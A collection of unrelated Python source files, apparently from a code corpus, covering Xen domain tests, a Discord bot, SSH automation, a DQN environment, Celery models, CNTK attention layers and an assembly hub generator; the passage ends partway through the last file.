| 68,039 | 27,464 |
#!/usr/bin/python
# Copyright (C) International Business Machines Corp., 2005
# Author: Paul Larson <pl@us.ibm.com>
# Description:
# Positive Tests:
# Tests for xm unpause
# 1) Create domain, verify it's up with console
# 2) randomly pause and unpause the domain
# 3) unpause it one last time
# 4) verify it's still alive with console
import time
import commands
from random import *
from XmTestLib import *
# Create a domain (default XmTestDomain, with our ramdisk)
domain = XmTestDomain()
# Start it
try:
console = domain.start()
except DomainError, e:
if verbose:
print "Failed to create test domain because:"
print e.extra
FAIL(str(e))
try:
# Make sure a command succeeds
run = console.runCmd("ls")
except ConsoleError, e:
FAIL(str(e))
# Close the console
domain.closeConsole()
seed(time.time())
for i in range(100):
pauseit = randint(0,1)
if(pauseit):
# Pause the domain
status, output = traceCommand("xm pause %s" % domain.getName())
if status != 0:
FAIL("xm pause returned invalid %i != 0", status)
else:
# Unpause the domain
status, output = traceCommand("xm unpause %s" % domain.getName())
if status != 0:
FAIL("xm unpause returned invalid %i != 0", status)
# Make sure the domain is unpaused before we finish up
status, output = traceCommand("xm unpause %s" % domain.getName())
if status != 0:
FAIL("xm unpause returned invalid %i != 0", status)
# Are we still alive after all that?
try:
console = domain.getConsole()
run = console.runCmd("ls")
except ConsoleError, e:
FAIL(str(e))
# Close the console
domain.closeConsole()
if run["return"] != 0:
FAIL("console failed to attach to supposedly unpaused domain")
# Stop the domain (nice shutdown)
domain.stop()
| 1,829 | 597 |
import asyncio
from demobot.utils import *
from demobot.handlers import add_message_handler, nested_get, nested_set, nested_pop
from commands.utilities import save
async def running(Demobot, msg, reg):
    """Message handler: register the message author as an election candidate.

    Triggered by messages matching "I want to run for <pos>" (see the regex
    passed to add_message_handler below).  Only members holding the server's
    'citizen' role may run; the requested position is normalised through an
    alias table, then a description is collected from the author over DM.
    """
    if nested_get(msg.server.id, "roles", 'citizen') in msg.author.roles:
        # canonical position names keyed by their accepted aliases
        aliases = {
            'rep': 'representative',
            'representative': 'representative',
            'ld': 'leader',
            'pres': 'leader',
            'president': 'leader',
            'leader': 'leader'
        }
        if reg.group('pos') not in aliases:
            # unknown position: silently ignore the request
            return
        dmm = await Demobot.send_message(msg.author, "DM me a description for " + aliases[reg.group('pos')] + ".")
        # wait up to 10 minutes for the author's DM reply
        m = await Demobot.wait_for_message(timeout=600, author=msg.author, channel=dmm.channel)
        if not m:
            # timed out: fall back to a placeholder description
            m = "*No description given*"
        else:
            m = m.content
        # drop any previous candidacy for this position before storing the new one
        # (Candidate presumably comes from the star imports above -- confirm)
        nested_pop(msg.server.id, 'elections', aliases[reg.group('pos')], msg.author.id)
        nested_set(Candidate(m, msg.author.id), msg.server.id, 'elections', aliases[reg.group('pos')], msg.author.id)
        await Demobot.send_message(msg.author, "You are now running.")
        # persist immediately; overrideperms bypasses save's permission check
        await save(None, None, None, overrideperms=True)
    else:
        await Demobot.send_message(msg.channel, "You must be a citizen!")
# register the handler for "I want to / would like to run for <pos>" messages
add_message_handler(running, r'I\s*(?:(?:want|would\s*like)\s*to\s*run|am\s*running)\s*for\s*(?P<pos>.*?)\Z')
| 1,420 | 480 |
#!/usr/bin/env python3
'''
Force Python3
'''
from __future__ import print_function
from pprint import pprint
from pssh.pssh_client import ParallelSSHClient
from pssh.exceptions import AuthenticationException, \
UnknownHostException, ConnectionErrorException
import pssh.utils
pssh.utils.enable_host_logger()
hosts = ['vm-dc-js00001-dnguyen.svale.netledger.com']
# route all SSH connections through the 'nx' proxy/jump host
client = ParallelSSHClient(hosts,proxy_host='nx')
try:
    print("before run_command")
    # stop_on_errors=False: collect per-host failures instead of raising
    output = client.run_command('ls -ltrh /home/mkettlewell', stop_on_errors=False)
    print("after run_command")
    # block until the remote command has finished on every host
    client.join(output)
    print(output)
    for host in output:
        # NOTE(review): dict-style access (output[host]['stdout']) matches
        # older pssh releases; newer ones return host-output objects with a
        # .stdout attribute -- confirm the installed pssh version.
        for line in output[host]['stdout']:
            print("Host %s - output: %s" % (host, line))
except (AuthenticationException, UnknownHostException, ConnectionErrorException):
    # connection-level failures are reported but not fatal
    print("exception...")
    pass
| 861 | 277 |
# Hardware pin map for the two expansion ports: each entry lists the port's
# two GPIO pins plus its ADC input channel.
# NOTE(review): pin numbers look like ESP32-style GPIO numbering -- confirm
# against the board schematic.
Port1 = { "pin1" : 33 , "pin2" : 32 , "adc" : 33} #ICSP Cable
Port2 = { "pin1" : 13 , "pin2" : 14 , "adc" : 34} #MP3 Port
'''
Created on 16-10-2012
@author: Jacek Przemieniecki
'''
from unifac.facade import Facade #@UnresolvedImport
class UI(object):
    """Tiny command-line front end over the UNIFAC Facade.

    Understands ADD / REMOVE / PRINT / RESET / TEMPERATURE commands, either
    read line by line from a file (parse_file) or fed one at a time
    (run_command).
    """
    def __init__(self):
        self.facade = Facade()

    def parse_file(self, f):
        """Open the file at path *f* and execute the commands inside."""
        with open(f) as raw_file:
            line_number = 1
            commands = raw_file.readlines()
            try:
                for line in commands:
                    self.run_command(line)
                    line_number += 1
            except Exception:  # TODO: Exception handling (report line_number)
                raise

    def run_command(self, line):
        """Available commands:
        ADD <smiles> <quantity>
        <smiles> - SMILES notation of compound added
        <quantity> - amount (in moles) of compound
        REMOVE <smiles> <quantity>
        <smiles> - SMILES notation of compound removed
        <quantity> - amount (in moles) of compound
        PRINT
        prints calculation results for current solution
        RESET
        resets the solution"""
        command = line.split()[0]
        parameters = line.split()[1:3]
        if command == "ADD":
            self.facade.add_molecule_smiles(parameters[0], float(parameters[1]))
        elif command == "REMOVE":
            # BUG FIX: the old code did float(-parameters[1]), negating the
            # *string* (TypeError on every REMOVE); convert first, then negate.
            self.facade.add_molecule_smiles(parameters[0], -float(parameters[1]))
        elif command == "PRINT":
            self.print_result(parameters[0])
        elif command == "RESET":
            self.facade.reset_solution()
        elif command == "TEMPERATURE":
            self.facade.set_temperature(float(parameters[0]))
        else:
            raise Exception()  # TODO: Exception handling CommandError("Unknown command: %s" % command)

    def print_result(self, iden):
        """Print the activity coefficient for compound *iden*."""
        print("Activity coefficient for: ", iden, " ", self.facade.get_coeff(iden))
# Simple REPL: read one command per line from stdin and execute it until
# EOF (input() then raises EOFError, which terminates the program).
ui = UI()
while 1:
    ui.run_command(input())
| 1,968 | 569 |
from pythonping import ping
import matplotlib.pyplot as plt
import matplotlib.animation as animation
from matplotlib import style
# Live latency plot: ping 8.8.8.8 on a timer and chart the rolling minimum
# round-trip time with matplotlib's FuncAnimation loop.
style.use('fivethirtyeight')
fig = plt.figure()
ax1 = fig.add_subplot(1,1,1)
# Seed series so the first frame has something to draw.
xs_min=[0]
ys_min=[5]
def animate(z):
    """FuncAnimation callback: ping once, append the min RTT, redraw.

    z is the frame counter supplied by FuncAnimation (unused).
    """
    ping_out = ping('8.8.8.8', count = 2)
    # HACK: pythonping's summary is only reachable via str(); take the last
    # 28 characters, which contain the "min/avg/max" round-trip field.
    ping_arr = str(ping_out)[len(str(ping_out))-28:].split(" ")
    print(ping_arr)
    for i in range(len(ping_arr)):
        if len(ping_arr[i]) > 10:
            # The long token is "min/avg/max"; keep the minimum component.
            time_min = ping_arr[i].split("/")[0]
            print(time_min)
    # NOTE(review): original indentation was ambiguous; appends are assumed
    # to run once per frame (x advances by 1 each call) -- confirm.
    xs_min.append(float(len(xs_min)))
    ys_min.append(float(time_min))
    #print(xs_min)
    #print(ys_min)
    ax1.clear()
    # Show only the 50 most recent samples.
    ax1.plot(xs_min[-50:],ys_min[-50:],linewidth=2)
ani = animation.FuncAnimation(fig, animate, interval=50)
plt.show()
print(xs_min)
| 848 | 350 |
# from cumulusci.robotframework.utils import selenium_retry
# The following decorator is commented out, because with it the
# library gets two extra keywords. I'm not certain if that's what
# should be happening, or if those two keywords are actually just
# helper functions that are accidentally ending up as keywords
# @selenium_retry
class TestLibrary(object):
    """Documentation for the TestLibrary library."""

    def library_keyword_one(self):
        """Keyword documentation with *bold* and _italics_"""
        message = "this is keyword one from TestLibrary.py"
        return message

    def library_keyword_two(self):
        # No keyword documentation for this one.
        message = "this is keyword two from TestLibrary.py"
        return message
| 669 | 175 |
#!/usr/bin/env python
'''spellcheck.py - parse source code and spell check comments, strings, or all
tokens.
Usage: find $SRCDIR -name \*.java | spellcheck.py --dict /usr/share/dict/words
Most users will need a large custom dictionary of technical terms, e.g.,
HTTP, malloc, etc. Users may want to pipe output through
"sort | uniq -c | sort -n" to find unusual and often incorrect spellings.
'''
__VERSION__ = 20180615
# TODO: allow compoundwords?
# TODO: bundle standard programming dictionary
# TODO: calculate edit distance from misspellings to likely spellings
# TODO: control word-splitting: camelCase, contractions, hyphenation
# TODO: diff mode for pre-push hooks
# TODO: emit file names and line numbers
# TODO: ignore comments, /* */, //, #
# TODO: ignore hex hashes
# TODO: ignore URLs
# TODO: incremental mode: show new misspellings since last run
# TODO: port to python 3
# TODO: show unusual spellings first (configurable limit?)
# TODO: single- and double-quote strings
# TODO: upper-case letters
# compare with: http://pypi.python.org/pypi/scspell
import argparse
import re
import string
import sys
# Delimiter recognized as the start/end of a string literal.
STRING_CHAR = '"'
def parse_stream(stream, tokenize_all):
    '''Parse strings from stream of source code and emit tokenized words, e.g.,
    string = "foo bar" -> [foo, bar]
    "myString" -> [my, string]

    With tokenize_all=True every character is tokenized; otherwise only text
    inside double-quoted string literals is considered.
    '''
    for line in stream:
        # NOTE: the local name `string` shadows the stdlib `string` module,
        # which is still used at module scope below; here it is the token
        # accumulated so far.
        string = ''
        in_string = False
        in_backslash = False
        last_char = None
        for char in line:
            if tokenize_all or in_string:
                if in_backslash:
                    # Character after a backslash ends the current token.
                    in_backslash = False
                    yield string
                    string = ''
                elif char == '\\':
                    in_backslash = True
                # parse camelCase
                # XXX better to do this outside parse_stream?
                elif (char.isupper() and last_char is not None and
                      last_char.isalpha() and not last_char.isupper()):
                    # Lower->Upper transition: emit the word so far, start anew.
                    yield string
                    string = char
                elif char == STRING_CHAR:
                    # Closing quote ends the current string token.
                    in_string = False
                    yield string
                    string = ''
                else:
                    string += char
            else:
                if char == STRING_CHAR:
                    in_string = True
            last_char = char
        # Flush whatever token remains at end of line.
        if len(string) > 0:
            yield string
            string = ''
# Case-folding table: uppercase -> lowercase.
# NOTE(review): string.maketrans and the two-argument str.translate(table,
# deletechars) used below are Python 2 only (see the "port to python 3" TODO).
translations = string.maketrans(string.ascii_uppercase, string.ascii_lowercase)
# Characters deleted entirely before dictionary lookup.
deletions = string.digits + string.punctuation + string.whitespace
def populate_dictionary(filename, dictionary):
    """Read one word per line from `filename`, normalize it (lowercase; strip
    digits, punctuation and whitespace) and add it to the `dictionary` set."""
    with open(filename, 'r') as f:
        for word in f:
            # Python 2 two-argument translate: case-fold, then delete chars.
            dictionary.add(word.translate(translations, deletions))
def main():
    """CLI entry point: spell check the files named on stdin.

    Prints each unknown word and exits with status 1 if any were found,
    0 otherwise.
    """
    parser = argparse.ArgumentParser(
        description='spell check strings in source code')
    # --dict may be given multiple times; all word lists are merged.
    parser.add_argument('--dict', dest='dictionaries',
                        action='append', required=True)
    parser.add_argument('--tokenize-all', dest='tokenize_all',
                        action='store_true', default=False)
    args = parser.parse_args(sys.argv[1:])
    all_dictionaries = set()
    for wordlist in args.dictionaries:
        populate_dictionary(wordlist, all_dictionaries)
    exit_code = 0
    # File names arrive one per line on stdin (e.g. from `find ... |`).
    for filename in sys.stdin:
        filename = filename[:-1]  # strip the trailing newline
        with open(filename, 'r') as f:
            for my_string in parse_stream(f, args.tokenize_all):
                # TODO: second parser!
                for word in re.split("[^A-Za-z]", my_string):
                    # Python 2 two-argument translate (see module note above).
                    cword = word.translate(translations, deletions)
                    if cword == '':
                        continue
                    if cword not in all_dictionaries:
                        exit_code = 1
                        print(word)
    sys.exit(exit_code)
# Standard script entry point.
if __name__ == '__main__':
    main()
| 3,875 | 1,075 |
import numpy as np
from collections import deque
from experience_replay import *
from brain import *
from agent import *
from Hyperparameters import *
class Environment:
    """Minimal "catch the falling ball" grid world for a DQN agent.

    Observations are a stack of the last CHANNEL_NUM binary frames; each
    frame has one pixel for the falling ball and a bar on the bottom row
    that the agent moves left/right.
    NOTE(review): `torch` is expected to be brought in by the star imports
    above (brain/agent/...); it is not imported in this file directly.
    """
    def __init__(self,x,y):
        param = Hyperparameters()
        self.x = x  # number of rows
        self.y = y  # number of columns
        # Rolling frame buffer; old frames drop off once CHANNEL_NUM is reached.
        self.buff = deque(maxlen= param.CHANNEL_NUM)
    def reset(self):
        """Start a new episode and return the initial stacked observation."""
        self.map = np.zeros([self.x,self.y])
        self.x_pos = 0
        # Ball starts at a random column on the top row.
        self.y_pos = np.random.randint(0,self.y)
        self.map[self.x_pos,self.y_pos] = 1
        # Bar occupies 5 cells of the bottom row at a random position.
        self.bar_init = np.random.randint(0,self.y-7)
        self.bar = [self.bar_init,self.bar_init+5]
        self.map[self.x-1,self.bar[0]:self.bar[1]] = 1
        # Prime the frame buffer with copies of the first frame.
        self.buff.append(self.map)
        self.buff.append(self.map)
        self.buff.append(self.map)
        return torch.tensor(np.stack(self.buff,axis=0),dtype= torch.float32).to('cpu')
    def step(self,action):
        """Advance one tick. action: 0=bar left, 1=bar right, 2=stay.

        Returns (stacked_observation, reward, done). The ball falls straight
        down one row per step; on the bottom row reward is +5 if caught by
        the bar, -1 otherwise.
        """
        self.x_pos += 1
        done = False
        reward = 0
        # NOTE(review): the catch test reads self.map *before* it is redrawn
        # below, i.e. against the bar position from the previous step.
        if self.x_pos == self.x-1 and self.map[self.x_pos,self.y_pos] == 1:
            reward = 5
            done = True
        if self.x_pos == self.x-1 and self.map[self.x_pos,self.y_pos] == 0:
            reward = -1
            done = True
        if action == 0:
            if self.bar[0] == 0:
                pass  # already at the left wall
            else:
                self.bar[0] -= 1
                self.bar[1] -= 1
        if action == 1:
            if self.bar[1] == self.y:
                pass  # already at the right wall
            else:
                self.bar[1] += 1
                self.bar[0] += 1
        if action == 2:
            pass  # explicit no-op
        # Redraw the frame with the new ball row and bar position.
        self.map = np.zeros([self.x,self.y])
        self.map[self.x_pos,self.y_pos] = 1
        self.map[self.x-1,self.bar[0]:self.bar[1]] = 1
        self.buff.append(self.map)
        return torch.tensor(np.stack(self.buff,axis=0),dtype= torch.float32).to('cpu'),reward,done
| 1,981 | 695 |
# -*- coding: utf-8 -*-
# __author__ = "wynterwang"
# __date__ = "2020/9/18"
from __future__ import absolute_import
from datetime import datetime
from celery import states
from restful_falcon.core.db.model import Column
from restful_falcon.core.db.model import Model
from restful_falcon.core.db.model import Sequence
from restful_falcon.core.db.type import DateTime
from restful_falcon.core.db.type import Integer
from restful_falcon.core.db.type import LargeBinary
from restful_falcon.core.db.type import PickleType
from restful_falcon.core.db.type import String
from restful_falcon.core.db.type import Text
class Task(Model):
    """
    Task result/status.

    ORM mapping of Celery's database result-backend table.
    """
    __tablename__ = "celery_taskmeta"
    __table_args__ = {"sqlite_autoincrement": True}
    # Surrogate key; the Sequence supports backends that need explicit sequences.
    id = Column(Integer, Sequence("task_id_sequence"), primary_key=True, autoincrement=True)
    # Celery task UUID.
    task_id = Column(String(155), unique=True)
    # Celery state string (PENDING/SUCCESS/FAILURE/...).
    status = Column(String(50), default=states.PENDING)
    # Pickled return value of the task.
    result = Column(PickleType, nullable=True)
    # Refreshed on every update so it reflects the last state change.
    date_done = Column(DateTime, default=datetime.utcnow, onupdate=datetime.utcnow, nullable=True)
    traceback = Column(Text, nullable=True)
class TaskExtended(Task):
    """
    For the extend result.

    Adds extra metadata columns to the same celery_taskmeta table;
    extend_existing allows re-opening the table already declared by Task.
    """
    __tablename__ = "celery_taskmeta"
    __table_args__ = {"sqlite_autoincrement": True, "extend_existing": True}
    name = Column(String(155), nullable=True)
    # Raw (binary-serialized) positional and keyword arguments.
    args = Column(LargeBinary, nullable=True)
    kwargs = Column(LargeBinary, nullable=True)
    worker = Column(String(155), nullable=True)
    retries = Column(Integer, nullable=True)
    queue = Column(String(155), nullable=True)
class TaskSet(Model):
    """
    TaskSet result.

    ORM mapping of Celery's group/taskset result table.
    """
    __tablename__ = "celery_tasksetmeta"
    __table_args__ = {"sqlite_autoincrement": True}
    id = Column(Integer, Sequence("taskset_id_sequence"), autoincrement=True, primary_key=True)
    # Celery taskset UUID.
    taskset_id = Column(String(155), unique=True)
    # Pickled aggregate result.
    result = Column(PickleType, nullable=True)
    date_done = Column(DateTime, default=datetime.utcnow, nullable=True)
| 2,040 | 691 |
from mirari.mirari.urls import *
from django.views.generic.base import RedirectView
from .views import *
from .vars import *
# Django URL routes for the Sellpoint app; APP comes from .vars.
app_name = APP
urlpatterns = [
    # Main point-of-sale template view.
    path('sv/', sv__Sellpoint__TemplateView.as_view(), name='sv__Sellpoint__TemplateView'),
    # Generic API endpoint dispatched by app/action/model slugs.
    path('api/SellpointApiView/<slug:app>/<slug:action>/<slug:model>/', Sellpoint__ApiView.as_view(), name='Sellpoint__ApiView'),
    path('SVbarcodeScanner/', SVbarcodeScanner__TemplateView.as_view(), name='SVbarcodeScanner__TemplateView'),
    path('TicketInvoiceMX/', TicketInvoiceMX__TemplateView.as_view(), name='TicketInvoiceMX__TemplateView'),
    path('GetTicketQR/', GetTicketQR__TemplateView.as_view(), name='GetTicketQR__TemplateView'),
]
# -*- coding:utf-8 -*-
class People(object):
    """No __str__ override: printing shows the default object repr."""
    pass


class People1(object):
    """Overrides __str__, so printing shows "123"."""

    def __str__(self):
        return "123"


# Use the print() function (valid in both Python 2 and 3) instead of the
# Python-2-only `print p` statement so the demo runs on either version.
p = People()
print(p)
p1 = People1()
print(p1)
import numpy as np
import cntk as C
from cntk.layers.blocks import _INFERRED
def OptimizedRnnStack(hidden_dim, num_layers=1, recurrent_op='gru', bidirectional=False, use_cudnn=True, name=''):
    """Factory returning a function that applies a recurrent stack to a sequence.

    With use_cudnn=True a single fused optimized_rnnstack op is used;
    otherwise composed GRU Recurrence layers are used as a fallback.
    NOTE(review): the fallback is always bidirectional and single-layer
    regardless of `bidirectional`/`num_layers` -- confirm this is intended.
    """
    if use_cudnn:
        # Weight shape is inferred from the input on first use (_INFERRED).
        W = C.parameter(_INFERRED + (hidden_dim,), init=C.glorot_uniform())
        def func(x):
            return C.optimized_rnnstack(x, W, hidden_dim, num_layers, bidirectional, recurrent_op=recurrent_op, name=name)
        return func
    else:
        def func(x):
            # Forward and backward GRU passes spliced along the feature axis.
            return C.splice(
                C.layers.Recurrence(C.layers.GRU(hidden_dim))(x),
                C.layers.Recurrence(C.layers.GRU(hidden_dim), go_backwards=True)(x),
                name=name)
        return func
def seq_loss(logits, y):
    """Negative log-likelihood of the sequence position(s) selected by mask y."""
    prob = C.sequence.softmax(logits)
    # gather keeps the step(s) where y is set; last() reduces to one value.
    return -C.log(C.sequence.last(C.sequence.gather(prob, y)))
'''
def attention_pooling(inputs, inputs_weights, decode, decode_weights, keys):
"""
inputs: shape=(dim, n)
inputs_weight: shape=(dim, dim)
decode: shape=(1, dec_dim)
decode_weights: shape=(dim, dec_dim)
keys: shape=(1, dim)
"""
w_in = C.times(inputs_weights ,inputs) #shape=(dim, n)
decode = C.transpose(decode, perm=(1,0))
w_dec = C.times(decode_weights ,decode) #shape=(dim, dim)
S = C.tanh(C.plus(C.transpose(w_in, perm=(1,0)), C.transpose(w_dec, perm=(1,0)))) #shape=(n, dim)
S = C.times(S, C.transpose(keys, perm=(1,0))) #shape=(n)
S = C.ops.sequence.softmax(S, name="softmax")
attention = C.transpose(C.times(inputs ,S), perm=(1,0))
return attention
'''
def attention_pooling(inputs, inputs_mask, inputs_weights, decode, decode_weights, keys):
    """Additive (Bahdanau-style) attention over `inputs` conditioned on `decode`.

    inputs: shape=(n, dim)
    inputs_weight: shape=(dim, dim)
    decode: shape=(1, dec_dim)
    decode_weights: shape=(dec_dim, dim)
    keys: shape=(dim, 1)
    Returns the attention-weighted context vector.
    """
    w_in = C.times(inputs, inputs_weights) #shape=(n, dim)
    w_dec = C.times(decode, decode_weights) #shape=(dim, 1)
    # tanh(Wx + Wh): broadcast the decoder term across the sequence axis.
    S = C.tanh(w_in + C.sequence.broadcast_as(w_dec, w_in)) #shape=(n, dim)
    # Mask padded positions with a large negative value before softmax.
    S = C.element_select(inputs_mask, S, C.constant(-1e+30))
    S = C.times(S, keys) #shape=(n)
    S = C.ops.sequence.softmax(S, name="softmax")
    # Weighted sum of the inputs = attended context vector.
    attention = C.reduce_sum(inputs * S, axis=0)
    return attention
'''
def question_pooling(inputs, inputs_dim):
Wp = C.parameter(shape=(inputs_dim,inputs_dim))
Vp = C.parameter(shape=(inputs_dim, 1))
outputs_w = C.times(C.tanh(C.times(inputs, Wp)), Vp)
# Vp = C.parameter(shape=(inputs_dim))
# outputs_w = C.sequence.reduce_sum(C.tanh(C.times(inputs, Wp)) * Vp, 1)
outputs_w = C.sequence.softmax(inputs)
outputs = outputs_w * inputs
return outputs
def att_weight(h_enc, h_dec, inputs_dim):
w_enc = C.parameter(shape=(inputs_dim,inputs_dim))
w_dec = C.parameter(shape=(inputs_dim,inputs_dim))
wh_enc = C.times(h_enc, w_enc)
wh_dec = C.times(h_dec, w_dec)
s_t = C.tanh(wh_dec + wh_enc)
v_t = C.parameter(shape=(inputs_dim, 1))
s_t = C.times(s_t ,v_t)
# v_t = C.parameter(shape=(inputs_dim))
# s_t = C.sequence.reduce_sum(s_t * v_t, 1)
wh_weight = C.sequence.softmax(s_t)
return wh_weight
'''
'''
def question_pooling(inputs, inputs_dim):
inputs_w, inputs_mask = C.sequence.unpack(inputs, padding_value=0).outputs
Wp = C.parameter(shape=(inputs_dim,inputs_dim))
Vp = C.parameter(shape=(inputs_dim,1))
outputs_w = C.times(C.tanh(C.times(inputs_w, Wp)), Vp)
outputs_w = C.softmax(C.element_select(inputs_mask, outputs_w, C.constant(-1e+30)), axis=0)
outputs = outputs_w * inputs_w
outputs = C.reduce_sum(outputs, 0)
return outputs
def att_weight(h_enc, h_dec, inputs_dim):
h_enc_w, h_enc_mask = C.sequence.unpack(h_enc, padding_value=0).outputs
w_enc = C.parameter(shape=(inputs_dim, inputs_dim))
w_dec = C.parameter(shape=(inputs_dim, inputs_dim))
v_t = C.parameter(shape=(inputs_dim))
wh_enc = C.times(h_enc_w, w_enc)
wh_dec = C.times(h_dec, w_dec)
s_t = C.tanh(C.sequence.broadcast_as(wh_dec, wh_enc) + wh_enc)
s_t = C.element_select(h_enc_mask, s_t, C.constant(-1e+30))
s_t = C.reduce_sum(s_t * v_t, 1)
wh_weight = C.softmax(s_t)
return wh_weight
'''
def question_pooling(inputs, inputs_dim):
    """Self-attentive pooling: softmax-weighted sum of the sequence `inputs`.

    NOTE(review): `inputs_dim` is unused in this Dense-layer variant (kept
    for signature compatibility with the commented-out versions above).
    """
    outputs_w = C.layers.Dense(1, activation=C.tanh, name='out_start')(inputs)
    outputs_w = C.sequence.softmax(outputs_w)
    outputs = C.sequence.reduce_sum(outputs_w * inputs)
    return outputs
def attention_weight(h_enc, h_dec, inputs_dim):
    """Additive attention weights of decoder state h_dec over encoder sequence h_enc."""
    enc = C.layers.Dense(inputs_dim, name='out_start')(h_enc)
    # Broadcast the (single) projected decoder state along the encoder sequence.
    dec = C.sequence.broadcast_as(C.layers.Dense(inputs_dim, name='out_start')(h_dec), enc)
    att_weight = C.layers.Dense(1, name='out_start')(C.tanh(enc+dec))
    # Normalize to a distribution over encoder positions.
    att_weight = C.sequence.softmax(att_weight)
    return att_weight
def all_spans_loss(start_logits, start_y, end_logits, end_y):
    """Span log-loss: -log P(start_y, end_y) with the partition function taken
    over all valid spans (start index <= end index)."""
    # this works as follows:
    # let end_logits be A, B, ..., Y, Z
    # let start_logits be a, b, ..., y, z
    # the tricky part is computing log sum (i<=j) exp(start_logits[i] + end_logits[j])
    # we break this problem as follows
    # x = logsumexp(A, B, ..., Y, Z), logsumexp(B, ..., Y, Z), ..., logsumexp(Y, Z), Z
    # y = a + logsumexp(A, B, ..., Y, Z), b + logsumexp(B, ..., Y, Z), ..., y + logsumexp(Y, Z), z + Z
    # now if we exponentiate each element in y we have all the terms we need. We just need to sum those exponentials...
    # logZ = last(sequence.logsumexp(y))
    x = C.layers.Recurrence(C.log_add_exp, go_backwards=True, initial_state=-1e+30)(end_logits)
    y = start_logits + x
    logZ = C.layers.Fold(C.log_add_exp, initial_state=-1e+30)(y)
    # logZ minus the log-scores of the gold start and end positions.
    return logZ - C.sequence.last(C.sequence.gather(start_logits, start_y)) - C.sequence.last(C.sequence.gather(end_logits, end_y))
def seq_hardmax(logits):
    """One-hot mask over the sequence marking the first position attaining the max logit."""
    seq_max = C.layers.Fold(C.element_max, initial_state=C.constant(-1e+30, logits.shape))(logits)
    s = C.equal(logits, C.sequence.broadcast_as(seq_max, logits))
    # Running count of max hits; used to break ties in favor of the first.
    s_acc = C.layers.Recurrence(C.plus)(s)
    return s * C.equal(s_acc, 1) # only pick the first one
class LambdaFunc(C.ops.functions.UserFunction):
    """Identity user-function that runs a side-effect callback on forward.

    Useful for debugging: `execute` (default: print the argument's shape and
    value) fires whenever `when(argument)` is true; the value and gradients
    pass through unchanged.
    """
    def __init__(self,
                 arg,
                 when=lambda arg: True,
                 execute=lambda arg: print((len(arg), arg[0].shape,) if type(arg) == list else (1, arg.shape,), arg),
                 name=''):
        self.when = when
        self.execute = execute
        super(LambdaFunc, self).__init__([arg], name=name)

    def infer_outputs(self):
        # Output mirrors the single input exactly (identity function).
        return [C.output_variable(self.inputs[0].shape, self.inputs[0].dtype, self.inputs[0].dynamic_axes)]

    def forward(self, argument, device=None, outputs_to_retain=None):
        if self.when(argument):
            self.execute(argument)
        # No state to retain; pass the input through unchanged.
        return None, argument

    def backward(self, state, root_gradients):
        # Identity: gradients flow through untouched.
        return root_gradients

    def clone(self, cloned_inputs):
        # BUG FIX: the original returned self.__init__(*cloned_inputs), which
        # is always None (and re-initialized self); clone() must return a new
        # UserFunction instance over the cloned inputs.
        return LambdaFunc(cloned_inputs[0], when=self.when,
                          execute=self.execute, name=self.name)
def print_node(v):
    """Wrap node v with a debugging LambdaFunc that prints values on forward."""
    return C.user_function(LambdaFunc(v))
#!/usr/bin/env python
#Copyright (C) 2013 by Ngan Nguyen
#
#Released under the MIT license, see LICENSE.txt
"""
Make "hub.txt", "groups.txt", files that are required by AssemblyHub
Also prepare description.html files
"""
import os, sys
from sonLib.bioio import system
from optparse import OptionGroup
from hal.assemblyHub.assemblyHubCommon import getProperName
from Bio import Phylo
from hal.assemblyHub.treeCommon import isBinaryTree
def writeDescriptionFile(genome, outdir):
    """Write <outdir>/description.html containing just the genome name.

    Uses a `with` block so the handle is closed even if the write raises
    (the original leaked the handle on error).
    """
    filename = os.path.join(outdir, "description.html")
    with open(filename, 'w') as f:
        f.write("%s\n" %genome)
def writeTrackDb_composite_html(file, treeFile):
    """Write an html snippet embedding the tree image at the (hard-coded) hub URL."""
    #HACK:
    #huburl = "http://hgwdev.cse.ucsc.edu/~nknguyen/ecoli/hub/TEST2"
    huburl = "http://hgwdev.cse.ucsc.edu/~nknguyen/birds/birds2"
    basename = os.path.basename(treeFile)
    # `with` guarantees the handle is closed even if the write fails.
    with open(file, 'w') as f:
        f.write("<img src=\"%s/%s\">\n" %(huburl, basename))
def writeTrackDb_compositeStart(f, shortLabel, longLabel, bbdirs, bwdirs, genomes, properName, url, img):
    """Write the header stanza of the 'hubCentral' composite track to handle f.

    The composite groups all annotation tracks (bigBed dirs in bbdirs, bigWig
    dirs in bwdirs) plus the Snake alignment tracks into a view x organism
    display matrix.
    """
    #Composite track includes all annotations in BED & WIGGLE formats, their lifted-over tracks, and Snake tracks
    f.write("track hubCentral\n")
    f.write("compositeTrack on\n")
    f.write("shortLabel %s\n" %shortLabel)
    f.write("longLabel %s\n" %longLabel)
    f.write("group comphub\n")
    # subGroup1 (views): one entry per track type, named by directory basename.
    bedtracktypes = [os.path.basename(b.rstrip('/')) for b in bbdirs]
    bedstr = " ".join(["%s=%s" %(item, item) for item in bedtracktypes])
    wigtracktypes = [os.path.basename(b.rstrip('/')) for b in bwdirs]
    wigstr = " ".join(["%s=%s" %(item, item) for item in wigtracktypes])
    f.write("subGroup1 view Track_Type Snake=Alignments %s %s\n" %(bedstr, wigstr))
    # subGroup2 (organisms): one entry per genome, using the display name when available.
    genomeStr = " ".join(["%s=%s" %(g, getProperName(g, properName)) for g in genomes])
    f.write("subGroup2 orgs Organisms %s\n" %genomeStr)
    f.write("dragAndDrop subTracks\n")
    f.write("#allButtonPair on\n")
    #f.write("sortOrder view=+ orgs=+\n")
    f.write("dimensions dimensionX=view dimensionY=orgs\n")
    f.write("noInherit on\n")
    f.write("priority 0\n")
    f.write("centerLabelsDense on\n")
    f.write("visibility full\n")
    f.write("html ../documentation/hubCentral\n")
    if url and img:
        # Link the phylogenetic tree image only if the hub is publicly served.
        imgurl = os.path.join(url, os.path.basename(img))
        f.write("treeImage %s\n" %imgurl)
    f.write("type bigBed 3\n")
    f.write("\n")
def writeTrackDb_compositeSubTrack(f, name, visibility):
    """Write one subtrack (view) stanza of the hubCentral composite track."""
    stanza = [
        "\ttrack hubCentral%s\n" % name,
        "\tshortLabel %s\n" % name,
        "\tview %s\n" % name,
        "\tvisibility %s\n" % visibility,
        "\tsubTrack hubCentral\n",
        "\n",
    ]
    f.writelines(stanza)
def writeGroupFile(outdir, hubLabel, annotations):
    """Write <outdir>/groups.txt defining the browser track groups.

    Static groups (user/map/comphub/snake) come first, then one group per
    annotation, then the trailing experimental group. Output bytes are
    identical to the previous hand-unrolled version.
    """
    filename = os.path.join(outdir, "groups.txt")
    # (name, label, priority, defaultIsClosed) in the exact order written.
    groups = [
        ("user", "Custom", 1, 1),
        ("map", "Mapping", 2, 0),
        ("comphub", hubLabel, 3, 0),
